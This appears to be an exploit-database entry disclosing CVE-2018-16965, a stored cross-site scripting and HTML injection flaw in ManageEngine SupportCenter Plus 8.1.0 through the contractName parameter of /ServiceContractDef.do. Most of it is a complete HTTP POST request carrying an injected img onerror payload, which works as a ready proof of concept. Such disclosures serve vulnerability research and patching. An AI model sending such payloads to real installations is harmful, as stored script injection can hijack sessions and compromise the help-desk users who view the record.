ManageEngine SupportCenter Plus 8.1.0 Cross Site Scripting

`# Exploit Title: ManageEngine SupportCenter Plus 8.1.0 - HTML Injection and Stored XSS  
# Date: 2018-09-12   
# Exploit Author: Ismail Tasdelen  
# Vendor Homepage: https://www.manageengine.com/  
# Hardware Link : https://www.manageengine.com/products/support-center/  
# Software : ZOHO Corp ManageEngine SupportCenter Plus  
# Product Version : 8.1.0  
# Build Number : 8106  
# Vulernability Type : Code Injection  
# Vulenrability : HTML Injection and Stored XSS  
# CVE : CVE-2018-16965  
  
In Zoho ManageEngine SupportCenter Plus 8.1.0, there is HTML Injection and Stored XSS via the /ServiceContractDef.do contractName parameter.  
  
# HTTP Request Header :  
  
POST /ServiceContractDef.do HTTP/1.1  
Host: demo.supportcenterplus.com  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://demo.supportcenterplus.com/ServiceContractDef.do  
Cookie: JSESSIONID=A23F9A80AF7BA95A4D3D1ADA0753BB00; JSESSIONIDSSO=4A3C963EDC44F7D4E50067D34DCDC1E6; [object HTMLDivElement]=hide  
Connection: close  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 604  
  
contractName=%22%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E%3Cimg+src%3Dx+onerror%3Dalert%28%27ismailtasdelen%27%29%3E&contractID=&contractInfoID=&contractMode=&createdBy=&services=&supportPlanRates=1%3D0.0&contractNumber=&currentDate=2018-09-12&fromDate=2018-09-12&toDate=2018-09-13&productList=&radio1=allProd&customerName=ismailtasdelen&description=&supportPlanID=1&supportPlanType=Hour+Based&rateTypeCost=0.0&totalCost=0.0&noofHours=0&noofMins=0&noofIncidents=0&servicename=&servicedesc=&attach=&attPath=&component=ServiceContract&attSize=&attachments=&selected=&beforeDays=00&beforeEnd=00&addContract=Save  
`